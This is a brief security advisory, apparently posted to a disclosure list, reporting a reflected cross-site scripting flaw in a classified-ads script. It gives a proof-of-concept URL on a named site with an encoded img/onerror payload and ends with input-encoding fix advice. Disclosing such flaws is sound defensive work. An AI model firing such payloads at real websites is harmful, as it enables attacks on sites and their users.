*Vendor:
*
http://www.yourownclassifieds.com

*Description:
*
Your own classified software is a script that helps you creates your own
store.

*Discovered by: Rafay Baloch*

Vulnerability: Non persistent XSS

The script fails to sanitize the input that is entered into the text box
resulting into a XSS.

*POC*:
http://www.gumtreeclone.com/cat-search/for-sales-2/XSS
http://www.gumtreeclone.com/cat-search/for-sales-2/%22%3E%3Cimg%20src=x%20onerror=prompt%280%29;%3E

*Fix*:

- All input generated at any point inside the application should be html
encoded and filtered/sanitized before it's
copied to the application response.

- All html special characters should be replaced with it's corresponding
html entities.

-- 
Warm Regards,
Rafay Baloch

http://rafayhackingarticles.net
http://techlotips.com